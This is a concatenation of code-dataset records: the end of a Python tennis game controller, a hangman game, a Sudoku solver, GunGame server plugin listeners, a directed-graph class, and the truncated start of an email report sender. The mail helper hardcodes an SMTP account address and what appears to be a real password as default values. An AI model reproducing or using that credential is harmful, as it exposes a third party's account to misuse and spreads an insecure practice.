enumerate(self.player_models_dictionary.keys()):\r\n\t\t\tself.player_models_dictionary[player_model].set_player_view_object(self.view_capability_handler_instance.get_all_views()[main_tennis_view].create_player(\\\r\n\t\t\tself.player_models_dictionary[player_model].get_player_name(), index, \\\r\n\t\t\tself.player_models_dictionary[player_model].get_player_color()))\r\n\t\t\tself.view_capability_handler_instance.get_all_views()[main_tennis_view].set_player_starting_positions(index)\r\n\t\r\n\t# Method which returns the view player object identified by key press\t\r\n\tdef request_player_object(self, pressed_key):\r\n\t\tfor player_name in self.player_models_dictionary.keys():\r\n\t\t\tplayer_model_object = self.player_models_dictionary[player_name]\r\n\t\t\tplayer_movement_keys = player_model_object.get_player_keys_string()\r\n\t\t\tif pressed_key in player_movement_keys:\r\n\t\t\t\treturn player_model_object\r\n\t\treturn None\r\n\t\r\n\t# Method called when a player scores a point - steps through tennis point scoring logic \r\n\tdef request_player_score(self, player_id):\r\n\t\tscoring_player_score = 0\r\n\t\tconceeding_player_score = 0\r\n\t\tscoring_player_object = None\r\n\t\t# For each player\r\n\t\tfor player_name in self.player_models_dictionary.keys():\r\n\t\t\tplayer_model_object = self.player_models_dictionary[player_name]\r\n\t\t\tplayer_model_id = player_model_object.get_player_id()\r\n\t\t\t# If the id is the same as the id of the scoring player\r\n\t\t\tif player_id == player_model_id:\r\n\t\t\t\t# assign player score and object\r\n\t\t\t\tscoring_player_score = player_model_object.get_player_score()\r\n\t\t\t\tscoring_player_object = player_model_object\r\n\t\t\telse:\r\n\t\t\t\t# Else id is of the conceeding player assing their value\r\n\t\t\t\tconceeding_player_score = player_model_object.get_player_score()\r\n\t\t# Call service method to apply tennis scoring logic \r\n\t\tplayer_score = self.tennis_model_services_instance.determine_score_value(scoring_player_score, conceeding_player_score)\r\n\t\t# Player score is within bounds there is no \"winner\" yet so set scoring players ammended score\r\n\t\tif player_score is not None:\r\n\t\t\tscoring_player_object.set_player_score(player_score)\r\n\t\telse:\r\n\t\t\t# Kill screen game end\r\n\t\t\tself.request_view_termination()\r\n\t\t\r\n\t\t\t\r\n# Start application\t\t\r\nTennis_Application_Controller()","sub_path":"Tennis_Controller.py","file_name":"Tennis_Controller.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"419657408","text":"# Program that simulates a game of hangman\r\n\r\nimport random\r\nimport re\r\n\r\n\r\ndef read_file():\r\n with open(\"words_alpha.txt\", \"r\") as file: # Read in dictionary of words\r\n dictionary = [line.strip() for line in file]\r\n return dictionary\r\n\r\n\r\n# pick_word fcn\r\ndef pick_word(dictionary):\r\n \"\"\"This function uses a dictionary text file to pick the word to guess\"\"\"\r\n word = \"\"\r\n while len(word) < 4: # we want a word that is 4 letters or longer\r\n word = random.choice(dictionary)\r\n return word.lower()\r\n\r\n# Prints board and guessed letters\r\ndef print_board():\r\n print(output)\r\n print(\"The letters guessed so far are: \", guessed_letters)\r\n print(\" \")\r\n\r\n# Picks a word from the dictionary for user to guess\r\ndef get_word(dictionary):\r\n word = pick_word(dictionary)\r\n letters = list(word)\r\n output = []\r\n for i in range(len(word)):\r\n 
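# one blank slot per letter of the hidden word\r\n        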
output.append('_')\r\n return word, letters, output\r\n\r\ndef get_indexes(count, letters, guess):\r\n indexes = []\r\n for x in range(count):\r\n if len(indexes) == 0:\r\n indexes.append(letters.index(guess))\r\n else:\r\n indexes.append(letters.index(guess, letters.index(guess) + x))\r\n return indexes\r\n\r\n\r\nif __name__ == \"__main__\":\r\n guessed_letters = [] # Declare vars\r\n wrong_left = 10\r\n word, letters, output = get_word(read_file())\r\n print(\"The word to guess is\", len(word), \"letters long. If you guess 10 incorrect letters, you lose.\")\r\n print(output) # Print word details\r\n\r\n # Run game loop\r\n while wrong_left != 0:\r\n guess = input(\"Please guess a letter or type 'quit' to exit game: \").lower()\r\n if guess == 'quit':\r\n print(\"Better luck next time!\")\r\n break\r\n if guessed_letters.count(guess) > 0:\r\n print(\"You already guessed that letter!\")\r\n continue\r\n count = letters.count(guess)\r\n if count == 0 and guess != \" \":\r\n wrong_left -= 1\r\n indexes = get_indexes(count, letters, guess)\r\n print(\"There is\", count, guess, \"- You have\", wrong_left, \"guesses before you lose.\")\r\n if output.count('_') == 0:\r\n print(\"Congrats!! You found the word!\", output)\r\n correct = True\r\n break\r\n for n in range(len(indexes)):\r\n output[indexes[n - 1]] = letters[indexes[n - 1]]\r\n guessed_letters.append(guess)\r\n print_board()\r\n print(\"The word was\", word)","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"300022028","text":"class Solution:\r\n def solveSudoku(self, board):\r\n \"\"\"\r\n 解数独,每个数字在每行每列以及每个3*3的方框中只能出现一次\r\n :param board: 给定数独\r\n :return:\r\n \"\"\"\r\n # 行数字计数 row_count[i][j]表示i行的数字j + 1出现的次数\r\n row_count = [[0 for j in range(0, 9)] for i in range(0, 9)]\r\n # 列数字计数 col_count[i][j]表示i列的数字j + 1出现的次数\r\n col_count = [[0 for j in range(0, 9)] for i in range(0, 9)]\r\n # 小矩阵中数字出现的次数 matrix_count[i][j]表示i个矩阵中的数字j + 1出现的次数\r\n matrix_count = [[0 for j in range(0, 9)] for i in range(0, 9)]\r\n\r\n # 需要填充的位置\r\n fill_loc = []\r\n\r\n # 查找出所有需要填充的位置和已经填充的数字\r\n for i in range(0, 9):\r\n for j in range(0, 9):\r\n if board[i][j] != \".\":\r\n # 计算所在小矩阵位置\r\n m_index = (i // 3) * 3 + (j // 3)\r\n # 计数\r\n row_count[i][int(board[i][j]) - 1] += 1\r\n col_count[j][int(board[i][j]) - 1] += 1\r\n matrix_count[m_index][int(board[i][j]) - 1] += 1\r\n else:\r\n # 统计需要填充位置\r\n fill_loc.append([i, j])\r\n\r\n # 问题解决标志\r\n flag = [False]\r\n\r\n def _fill(fill_loc_index):\r\n \"\"\"\r\n 填充\r\n :param fill_loc_index:需要填充位置的索引\r\n :return:\r\n \"\"\"\r\n # 所有位置填充完毕\r\n if fill_loc_index >= len(fill_loc) or flag[0]:\r\n flag[0] = True\r\n return\r\n\r\n # 1-9依次填充\r\n for num in range(1, 10):\r\n # 计算小矩阵的索引\r\n m_index = (fill_loc[fill_loc_index][0] // 3) * 3 + (fill_loc[fill_loc_index][1] // 3)\r\n # 判断数字填充进入之后不符合条件\r\n if row_count[fill_loc[fill_loc_index][0]][num - 1] != 0 or \\\r\n col_count[fill_loc[fill_loc_index][1]][num - 1] != 0 or \\\r\n matrix_count[m_index][num - 1] != 0:\r\n continue\r\n\r\n # 填充\r\n board[fill_loc[fill_loc_index][0]][fill_loc[fill_loc_index][1]] = str(num)\r\n # 添加计数\r\n row_count[fill_loc[fill_loc_index][0]][num - 1] += 1\r\n col_count[fill_loc[fill_loc_index][1]][num - 1] += 1\r\n matrix_count[m_index][num - 1] += 1\r\n # 填充下一个位置\r\n _fill(fill_loc_index + 1)\r\n\r\n # 如果问题未解决就还原\r\n if flag[0] is False:\r\n # 填充还原\r\n 
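# undo this tentative digit so the next candidate can be tried (backtracking)\r\n                    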
board[fill_loc[fill_loc_index][0]][fill_loc[fill_loc_index][1]] = \".\"\r\n # 计数还原\r\n row_count[fill_loc[fill_loc_index][0]][num - 1] -= 1\r\n col_count[fill_loc[fill_loc_index][1]][num - 1] -= 1\r\n matrix_count[m_index][num - 1] -= 1\r\n # 解决了就跳出\r\n else:\r\n break\r\n\r\n # 从第一个位置开始填充\r\n _fill(0)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n board = [[\"5\", \"3\", \".\", \".\", \"7\", \".\", \".\", \".\", \".\"],\r\n [\"6\", \".\", \".\", \"1\", \"9\", \"5\", \".\", \".\", \".\"],\r\n [\".\", \"9\", \"8\", \".\", \".\", \".\", \".\", \"6\", \".\"],\r\n [\"8\", \".\", \".\", \".\", \"6\", \".\", \".\", \".\", \"3\"],\r\n [\"4\", \".\", \".\", \"8\", \".\", \"3\", \".\", \".\", \"1\"],\r\n [\"7\", \".\", \".\", \".\", \"2\", \".\", \".\", \".\", \"6\"],\r\n [\".\", \"6\", \".\", \".\", \".\", \".\", \"2\", \"8\", \".\"],\r\n [\".\", \".\", \".\", \"4\", \"1\", \"9\", \".\", \".\", \"5\"],\r\n [\".\", \".\", \".\", \".\", \"8\", \".\", \".\", \"7\", \"9\"]]\r\n\r\n Solution().solveSudoku(board)\r\n\r\n for row in board:\r\n print(row)\r\n","sub_path":"LeetCode_Python/Test_37_solveSudoku.py","file_name":"Test_37_solveSudoku.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"209732611","text":"# ../gungame/core/listeners.py\n\n\"\"\"Event and level listeners and misc helper functions.\"\"\"\n\n# =============================================================================\n# >> IMPORTS\n# =============================================================================\n# Source.Python\nfrom colors import BLUE, RED, WHITE\nfrom cvars import ConVar\nfrom entities.entity import Entity\nfrom events import Event\nfrom filters.entities import EntityIter\nfrom listeners import OnLevelInit, OnLevelShutdown\nfrom listeners.tick import Delay\nfrom weapons.manager import weapon_manager\n\n# GunGame\nfrom .config.misc import (\n allow_kills_after_round, cancel_on_fire, dynamic_chat_time, give_armor,\n give_defusers, level_on_protect,\n)\nfrom .config.punishment import (\n level_one_team_kill, suicide_punish, team_kill_punish,\n)\nfrom .config.warmup import enabled as warmup_enabled, weapon as warmup_weapon\nfrom .config.weapon import (\n order_file, order_randomize, multi_kill_override, prop_physics\n)\nfrom .credits import gungame_credits\nfrom .events.included.match import GG_Start\nfrom .leaders import leader_manager\nfrom .messages import message_manager\nfrom .players.attributes import AttributePostHook\nfrom .players.dictionary import player_dictionary\nfrom .sounds.manager import sound_manager\nfrom .status import GunGameMatchStatus, GunGameRoundStatus, GunGameStatus\nfrom .warmup import warmup_manager\nfrom .weapons.manager import weapon_order_manager\n\n\n# =============================================================================\n# >> ALL DECLARATION\n# =============================================================================\n__all__ = (\n 'start_match',\n)\n\n\n# =============================================================================\n# >> GLOBAL VARIABLES\n# =============================================================================\n# Create a set to store userids that have already had join messages\n_joined_players = set()\n\n# Create a set to store userids that have recently switched teams\n_team_changers = set()\n\n\n# =============================================================================\n# >> PLAYER GAME EVENTS\n# 
=============================================================================\n@Event('player_spawn')\ndef _player_spawn(game_event):\n \"\"\"Give the player their level weapon.\"\"\"\n # Is GunGame active?\n if GunGameStatus.MATCH is not GunGameMatchStatus.ACTIVE:\n return\n\n # Use try/except to get the player's instance\n try:\n player = player_dictionary[game_event['userid']]\n except ValueError:\n return\n\n # Verify that the player is on a team\n if player.team < 2:\n return\n\n # Spawn protection\n player.give_spawn_protection()\n\n # Give the player their new weapon\n player.strip_weapons()\n player.give_level_weapon()\n\n # Give CTs defusers, if need be\n if player.team == 3 and give_defusers.get_bool():\n player.has_defuser = True\n\n # Give player armor, if necessary\n armor_type = {1: 'kevlar', 2: 'assaultsuit'}.get(give_armor.get_int())\n if armor_type is not None:\n equip = Entity.find_or_create('game_player_equip')\n equip.add_output(\n 'item_{armor_type} 1'.format(\n armor_type=armor_type\n ),\n caller=player,\n activator=player,\n )\n\n # Skip bots\n if player.is_fake_client():\n return\n\n # Send the player their level information\n _send_level_info(player)\n\n\n@Event('player_death')\ndef _player_death(game_event):\n \"\"\"Award the killer with a multi-kill increase or level increase.\"\"\"\n # Is GunGame active?\n if GunGameStatus.MATCH is not GunGameMatchStatus.ACTIVE:\n return\n\n # Is the round active or should kills after the round count?\n if (\n GunGameStatus.ROUND is GunGameRoundStatus.INACTIVE and\n not allow_kills_after_round.get_int()\n ):\n return\n\n # Get the victim\n userid = game_event['userid']\n\n # Get the attacker\n attacker = game_event['attacker']\n\n # Was this a suicide?\n if attacker in (userid, 0):\n _punish_suicide(userid)\n return\n\n # Get the victim's instance\n victim = player_dictionary[userid]\n\n # Get the attacker's instance\n killer = player_dictionary[attacker]\n\n # Was this a team-kill?\n if victim.team == killer.team:\n _punish_team_kill(killer)\n return\n\n if killer.in_spawn_protection and not level_on_protect.get_int():\n return\n\n # Did the killer kill using their level's weapon?\n weapon = game_event['weapon']\n if weapon != 'prop_physics':\n if weapon_manager[weapon].basename != killer.level_weapon:\n return\n elif not prop_physics.get_int():\n return\n\n # Increase the killer's multi_kill\n killer.multi_kill += 1\n\n # Does the player need leveled up?\n if killer.multi_kill < killer.level_multi_kill:\n\n # If not, no need to go further\n return\n\n # Level the player up\n killer.increase_level(\n levels=1,\n reason='kill',\n victim=userid,\n )\n\n\n@Event('player_activate')\ndef _player_activate(game_event):\n \"\"\"Add player to leaders and send join message.\"\"\"\n # Get the player's userid\n userid = game_event['userid']\n\n # Add the player to the leader dictionary\n leader_manager.add_player(userid)\n\n # Is the player just joining the game?\n if userid in _joined_players:\n return\n\n # Add the userid to the joined players set\n _joined_players.add(userid)\n\n # Get the player's instance\n player = player_dictionary[userid]\n\n # Is the player a bot?\n if player.is_fake_client():\n return\n\n if player.wins:\n message = 'Player:Join:Ranked' if player.rank else 'Player:Join:Wins'\n message_manager.chat_message(message, player=player)\n\n # Print a message if the joining player is in the credits\n for credit_type in gungame_credits:\n for name in gungame_credits[credit_type]:\n steam_id2 = 
gungame_credits[credit_type][name]['steam_id2']\n steam_id3 = gungame_credits[credit_type][name]['steam_id3']\n if player.steamid in (steam_id2, steam_id3):\n message_manager.chat_message(\n 'Player:Join:Credits',\n player=player,\n credit_type=credit_type,\n )\n return\n\n\n@Event('player_disconnect')\ndef _player_disconnect(game_event):\n \"\"\"Store the disconnecting player's values and remove from dictionary.\"\"\"\n userid = game_event['userid']\n player_dictionary.safe_remove(userid)\n leader_manager.check_disconnect(userid)\n\n\n@Event('player_team')\ndef _player_team(game_event):\n userid = game_event['userid']\n if userid in _team_changers:\n return\n _team_changers.add(userid)\n Delay(0.2, _team_changers.remove, (userid, ))\n\n\n@Event('weapon_fire')\ndef _weapon_fire(game_event):\n if not cancel_on_fire.get_int():\n return\n player = player_dictionary[game_event['userid']]\n if not player.in_spawn_protection:\n return\n if cancel_on_fire.get_int():\n player.remove_spawn_protection()\n\n\n# =============================================================================\n# >> ROUND GAME EVENTS\n# =============================================================================\n@Event('round_start')\ndef _round_start(game_event):\n \"\"\"Disable buyzones and set the round status to ACTIVE.\"\"\"\n GunGameStatus.ROUND = GunGameRoundStatus.ACTIVE\n for entity in EntityIter('func_buyzone'):\n entity.disable()\n\n\n@Event('round_end')\ndef _round_end(game_event):\n \"\"\"Set the round status to INACTIVE since the round ended.\"\"\"\n GunGameStatus.ROUND = GunGameRoundStatus.INACTIVE\n\n\n# =============================================================================\n# >> MISC GAME EVENTS\n# =============================================================================\n@Event('server_cvar')\ndef _server_cvar(game_event):\n \"\"\"Set the weapon order value if the ConVar is for the weapon order.\"\"\"\n if GunGameStatus.MATCH == GunGameMatchStatus.UNLOADING:\n return\n\n # Get the ConVar name and its new value\n cvarname = game_event['cvarname']\n cvarvalue = game_event['cvarvalue']\n\n # Did the weapon order change?\n if cvarname == order_file.name:\n\n # Set the new weapon order\n weapon_order_manager.set_active_weapon_order(cvarvalue)\n\n # Did the randomize value change?\n elif cvarname == order_randomize.name:\n\n # Set the randomize value\n weapon_order_manager.set_randomize(cvarvalue)\n\n # Did the multi_kill override value change?\n elif cvarname == multi_kill_override.name:\n\n # Print out the new weapon order\n weapon_order_manager.print_order()\n\n # Did the warmup weapon change?\n elif cvarname == warmup_weapon.name:\n\n # Set the new warmup weapon\n warmup_manager.set_warmup_weapon()\n\n\n# =============================================================================\n# >> GUNGAME EVENTS\n# =============================================================================\n@Event('gg_win')\ndef _gg_win(game_event):\n \"\"\"Increase the win total for the winner and end the map.\"\"\"\n # Set the match status\n GunGameStatus.MATCH = GunGameMatchStatus.POST\n\n # Get the winner\n winner = player_dictionary[game_event['winner']]\n\n # Increase the winner's win total if they are not a bot\n if not winner.is_fake_client():\n winner.wins += 1\n\n # Send the winner messages\n message_manager.chat_message(\n message='Winner:Long',\n index=winner.index,\n winner=winner.name,\n )\n for second in range(4):\n Delay(\n second,\n message_manager.center_message,\n kwargs={\n 'message': 
'Winner:Short',\n 'winner': winner.name,\n }\n )\n color = {2: RED, 3: BLUE}.get(winner.team, WHITE)\n message_manager.top_message(\n message='Winner:Short',\n color=color,\n winner=winner.name\n )\n\n # Play the winner sound\n winner_sound = sound_manager.play_sound('winner')\n\n # Set the dynamic chat time, if needed\n if dynamic_chat_time.get_bool():\n ConVar('mp_chattime').set_float(winner_sound.duration)\n\n # End the match to move to the next map\n entity = Entity.find_or_create('game_end')\n entity.end_game()\n\n\n@Event('gg_map_end')\ndef _gg_map_end(game_event):\n \"\"\"Set the match status to POST after the map has ended.\"\"\"\n GunGameStatus.MATCH = GunGameMatchStatus.POST\n\n\n@Event('gg_start')\ndef _gg_start(game_event):\n \"\"\"Set the match status to ACTIVE and post the weapon order.\"\"\"\n # Set the match status\n GunGameStatus.MATCH = GunGameMatchStatus.ACTIVE\n\n # Post the weapon order\n weapon_order_manager.print_order()\n\n\n@Event('gg_level_up')\ndef _gg_level_up(game_event):\n \"\"\"Increase the player leader level and send level info.\"\"\"\n userid = game_event['leveler']\n leader_manager.player_level_up(userid)\n player = player_dictionary[userid]\n player.play_sound('level_up')\n _send_level_info(player)\n\n\n@Event('gg_level_down')\ndef _gg_level_down(game_event):\n \"\"\"Set the player's level in the leader dictionary.\"\"\"\n userid = game_event['leveler']\n leader_manager.player_level_down(userid)\n player_dictionary[userid].play_sound('level_down')\n\n\n# =============================================================================\n# >> LEVEL LISTENERS\n# =============================================================================\n@OnLevelInit\ndef _level_init(map_name):\n \"\"\"Set match status to INACTIVE when a new map is started.\"\"\"\n # Is GunGame still loading?\n if GunGameStatus.MATCH is GunGameMatchStatus.LOADING:\n return\n\n # Set the match status\n GunGameStatus.MATCH = GunGameMatchStatus.INACTIVE\n\n # Start match (or warmup)\n start_match()\n\n\n@OnLevelShutdown\ndef _level_shutdown():\n \"\"\"Clear the player dictionary on map change.\"\"\"\n player_dictionary.clear()\n\n\n# =============================================================================\n# >> ATTRIBUTE LISTENERS\n# =============================================================================\n@AttributePostHook('multi_kill')\ndef _post_multi_kill(player, attribute, new_value, old_value):\n \"\"\"Send multi_kill info message.\"\"\"\n # Is the multi_kill being reset to 0?\n if not new_value:\n return\n\n # Is the player going to level up?\n multi_kill = player.level_multi_kill\n if multi_kill == new_value:\n return\n\n # Send the multi_kill message\n player.hint_message(\n message='LevelInfo:Current:Kills',\n kills=new_value,\n total=multi_kill,\n )\n player.play_sound('multi_kill')\n\n\n# =============================================================================\n# >> HELPER FUNCTIONS\n# =============================================================================\ndef start_match():\n \"\"\"Start the match if not already started or on hold.\"\"\"\n # Is warmup supposed to happen?\n if warmup_enabled.get_int():\n\n # Start warmup\n warmup_manager.start_warmup()\n return\n\n # Is the match supposed to start?\n if GunGameStatus.MATCH is GunGameMatchStatus.INACTIVE:\n\n # Start the match\n GG_Start().fire()\n\n\ndef _send_level_info(player):\n \"\"\"Send level information to the given player.\"\"\"\n # Get the player's language\n language = player.language\n\n # Get the 
player's current level information\n text = message_manager['LevelInfo:Current:Level'].get_string(\n language,\n player=player,\n total=weapon_order_manager.max_levels,\n )\n\n # Add the player's weapon information to the message\n text += message_manager['LevelInfo:Current:Weapon'].get_string(\n language,\n player=player,\n )\n\n # Get the player's current level's multi_kill value\n multi_kill = player.level_multi_kill\n\n # If the multi_kill value is not 1, add the multi_kill to the message\n if multi_kill > 1:\n text += message_manager['LevelInfo:Current:Kills'].get_string(\n language,\n kills=player.multi_kill,\n total=player.level_multi_kill,\n ) + '\\n'\n\n # Get the current leaders\n leaders = leader_manager.current_leaders\n\n # Get the leader's level\n leader_level = leader_manager.leader_level\n\n # Are there no leaders?\n if leaders is None:\n\n # Add the no leaders text to the message\n text += message_manager['LevelInfo:Leaders:None'].get_string(language)\n\n # Is the player the only current leader?\n elif len(leaders) == 1 and player.userid in leaders:\n\n # Add the current leader text to the message\n text += message_manager[\n 'LevelInfo:Current:Leader'\n ].get_string(language)\n\n # Is the player one of multiple current leaders?\n elif len(leaders) > 1 and player.userid in leaders:\n\n # Add the amongst leaders text to the message\n text += message_manager[\n 'LevelInfo:Leaders:Among'\n ].get_string(language)\n\n # Is the player not one of the current leaders?\n else:\n\n # Add the current leader text to the message\n text += message_manager['LevelInfo:Leaders:Level'].get_string(\n language,\n level=leader_level,\n total=weapon_order_manager.max_levels,\n weapon=weapon_order_manager.active[leader_level].weapon,\n )\n\n # Send the player's level information message\n player.hint_message(message=text)\n\n\ndef _punish_suicide(userid):\n levels = suicide_punish.get_int()\n if not levels:\n return\n\n if userid in _team_changers:\n return\n\n player = player_dictionary.get(userid)\n if player is None:\n return\n\n if player.level == 1:\n return\n\n player.decrease_level(\n levels=levels,\n reason='suicide'\n )\n player.chat_message(\n message='Punishment:Suicide',\n player=player,\n )\n\n\ndef _punish_team_kill(player):\n levels = team_kill_punish.get_int()\n if not levels:\n return\n\n if player.levels == 1:\n if level_one_team_kill.get_int():\n player.slay()\n player.chat_message(\n message='Punishment:TeamKill:Slay',\n )\n return\n\n player.decrease_level(\n levels=levels,\n reason='team-kill',\n )\n player.chat_message(\n message='Punishment:TeamKill:Level',\n player=player,\n )\n","sub_path":"addons/source-python/plugins/gungame/core/listeners.py","file_name":"listeners.py","file_ext":"py","file_size_in_byte":16515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"372671714","text":"from GraphInterface import GraphInterface\r\nfrom NodeData import NodeData\r\n\r\n\r\nclass DiGraph(GraphInterface):\r\n\r\n def __init__(self):\r\n \"\"\"\r\n The constructor for object DiGraph\r\n \"\"\"\r\n self.nodes = {}\r\n self.NumOfEdges = 0\r\n self.ModeCount = 0\r\n\r\n def getNode(self, key):\r\n \"\"\"\r\n returns the node_data by the key.\r\n \"\"\"\r\n if key not in self.nodes:\r\n return None\r\n else:\r\n return self.nodes[key]\r\n\r\n def getEdge(self, src, dest):\r\n \"\"\"\r\n returns the data of the edge (src,dest), null if none.\r\n Note: this method should run in O(1) time.\r\n \"\"\"\r\n if src in self.nodes:\r\n 
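# outgoing edges are stored on the source node itself\r\n            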
return self.nodes[src].getNiEdge(dest)\r\n else:\r\n return None\r\n\r\n def addNode(self, n):\r\n \"\"\"\r\n adds a new node to the graph with the given node_data.\r\n \"\"\"\r\n if n.getKey() not in self.nodes:\r\n self.nodes[n.getKey()] = n\r\n self.ModeCount += 1\r\n\r\n def add_node(self, node_id, pos=None):\r\n \"\"\"\r\n adds a node to the graph with id 'node_id'\r\n \"\"\"\r\n n = NodeData(node_id, pos)\r\n self.addNode(n)\r\n\r\n def hasEdge(self, src, dest):\r\n \"\"\"\r\n return true iff (if and only if) there is an edge between src and dest\r\n Note: this method should run in O(1) time\r\n \"\"\"\r\n if src in self.nodes:\r\n return self.nodes[src].hasNi_out(dest)\r\n else:\r\n return False\r\n\r\n def add_edge(self, id1, id2, weight):\r\n \"\"\"\r\n Connects an edge with weight 'weight' between node id1 to node id2.\r\n Note: this method should run in O(1) time.\r\n \"\"\"\r\n if not self.hasEdge(id1, id2) and id1 != id2:\r\n self.nodes[id1].addNi_out(id2, weight)\r\n self.nodes[id2].addNi_in(id1)\r\n self.NumOfEdges += 1\r\n self.ModeCount += 1\r\n\r\n def getV(self):\r\n \"\"\"\r\n This method returns a pointer (shallow copy) for the\r\n collection representing all the nodes in the graph.\r\n Note: this method should run in O(1) time.\r\n \"\"\"\r\n return self.nodes.values()\r\n\r\n def get_all_v(self):\r\n \"\"\"\r\n return a dictionary of all the nodes in the Graph, each node is represented using a pair\r\n (node_id, node_data)\r\n \"\"\"\r\n return self.nodes\r\n\r\n def get_all_e(self):\r\n s = set()\r\n for v in self.nodes.values():\r\n for e in v.getNi_out():\r\n s.add(e)\r\n for e in v.getNi_in():\r\n s.add(self.getEdge(e, v.getKey()))\r\n return list(s)\r\n\r\n def all_in_edges_of_node(self, id1):\r\n \"\"\"\r\n return a dictionary of all the nodes connected to (into) node_id ,\r\n each node is represented using a pair (other_node_id, weight)\r\n \"\"\"\r\n if id1 in self.nodes:\r\n connected_nodes = {}\r\n in_edges = self.nodes[id1].getNi_in()\r\n for i in in_edges:\r\n connected_nodes[i] = self.getEdge(i, id1).getWeight()\r\n return connected_nodes\r\n else:\r\n return {}\r\n\r\n def all_out_edges_of_node(self, id1):\r\n \"\"\"\r\n return a dictionary of all the nodes connected from node_id , each node is represented using a pair\r\n (other_node_id, weight)\r\n \"\"\"\r\n if id1 in self.nodes:\r\n connected_nodes = {}\r\n out_edges = self.nodes[id1].getNi_out()\r\n for edge in out_edges:\r\n connected_nodes[edge.getDest()] = edge.getWeight()\r\n return connected_nodes\r\n else:\r\n return {}\r\n\r\n def getE(self, node_id):\r\n \"\"\"\r\n This method returns a pointer (shallow copy) for the\r\n collection representing all the edges getting out of\r\n the given node (all the edges starting (source) at the given node).\r\n Note: this method should run in O(k) time, k being the collection size.\r\n \"\"\"\r\n if node_id in self.nodes:\r\n return self.nodes[node_id].getNi_out()\r\n else:\r\n return {}\r\n\r\n def remove_node(self, key):\r\n \"\"\"\r\n Deletes the node (with the given ID) from the graph -\r\n and removes all edges which starts or ends at this node.\r\n This method should run in O(k), V.degree=k, as all the edges should be removed.\r\n \"\"\"\r\n if self.getNode(key) is not None:\r\n in_edges = self.nodes[key].getNi_in()\r\n for i in in_edges:\r\n self.nodes[i].removeEdge_out(key)\r\n self.NumOfEdges -= 1\r\n self.ModeCount += 1\r\n del self.nodes[key]\r\n return True\r\n else:\r\n return False\r\n\r\n def remove_edge(self, node_id1, node_id2):\r\n 
\"\"\"\r\n Deletes the edge from the graph.\r\n Note: this method should run in O(1) time.\r\n \"\"\"\r\n if self.hasEdge(node_id1, node_id2):\r\n e = self.nodes[node_id1].removeEdge_out(node_id2)\r\n self.nodes[node_id2].removeEdge_in(node_id1)\r\n self.NumOfEdges -= 1\r\n self.ModeCount += 1\r\n return e\r\n else:\r\n return None\r\n\r\n def v_size(self):\r\n \"\"\"\r\n Returns the number of vertices (nodes) in the graph.\r\n Note: this method should run in O(1) time.\r\n \"\"\"\r\n return len(self.nodes)\r\n\r\n def e_size(self):\r\n \"\"\"\r\n Returns the number of edges (assume directional graph).\r\n Note: this method should run in O(1) time.\r\n \"\"\"\r\n return self.NumOfEdges\r\n\r\n def get_mc(self):\r\n \"\"\"\r\n Returns the Mode Count - for tests changes in the graph.\r\n \"\"\"\r\n return self.ModeCount\r\n\r\n def __eq__(self, other):\r\n \"\"\"\r\n equals function - return true if the two object are equals.\r\n else, return false.\r\n \"\"\"\r\n if len(self.nodes) != len(other.getV()):\r\n return False\r\n for i in self.nodes:\r\n if other.getNode(i) is None:\r\n return False\r\n if other.getNode(i) != self.nodes[i]:\r\n return False\r\n return True\r\n\r\n def __repr__(self):\r\n \"\"\"\r\n Returns a string representing the directed graph\r\n \"\"\"\r\n s = \"-----\\nDiGraph: \\nNodes: (Total of \" + str(self.v_size()) + \" nodes.\\n\"\r\n for n in self.nodes.values():\r\n s += str(n.getKey()) + ', '\r\n s += \"\\nEdges: (Total of \" + str(self.e_size()) + \" edges.\\n\"\r\n for e in self.get_all_e():\r\n s += \"edge src: \" + str(e.getSrc()) + \", dest: \" + str(e.getDest()) + \", w: \" + str(e.getWeight()) + '\\n'\r\n s += \"Num of MC: \" + str(self.ModeCount) + \"\\n-----\"\r\n return s\r\n\r\n\r\n","sub_path":"ex3/src/DiGraph.py","file_name":"DiGraph.py","file_ext":"py","file_size_in_byte":6835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"595316878","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport smtplib\nfrom email import encoders\nfrom email.header import Header\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\nfrom utils.common.log import logger\nfrom utils.config import Config, REPORT_FILE\n\n\nclass Mail(object):\n def __init__(self, target_address_list):\n e = Config().get('mail')\n self.mail_host = e.get(\n 'mail_host') if e and e.get('mail_host') else \"smtp.qq.com\"\n self.host_port = e.get(\n 'host_port') if e and e.get('host_port') else 465\n self.mail_user = e.get(\n 'mail_user') if e and e.get('mail_user') else \"78376474@qq.com\"\n self.mail_pwd = e.get(\n 'mail_pwd') if e and e.get('mail_pwd') else \"onctyyqycumtcbbb\"\n\n self.target_addr_list = target_address_list\n self.mail_subject = \"Test report\"\n self.charset = 'utf-8'\n\n # create a mail object based on email().MIMEMultipart()\n # module email is responsible for mail's content\n def mail_obj(self):\n mail_obj = MIMEMultipart()\n mail_obj['Subject'] = Header(self.mail_subject, self.charset)\n # mail_obj['From'] = Header(self.mail_user, charset)\n return mail_obj\n\n def attach_content(self, email_obj):\n f = open(REPORT_FILE, 'rb')\n mail_body = f.read()\n f.close()\n content = MIMEText(mail_body, 'html', self.charset)\n email_obj.attach(content)\n\n @staticmethod\n def attach_file(email_obj):\n file = MIMEBase('application', 'octet-stream')\n file.set_payload(open(REPORT_FILE, 'rb').read())\n encoders.encode_base64(file)\n 
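# attach the base64-encoded report under its original file name\n        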
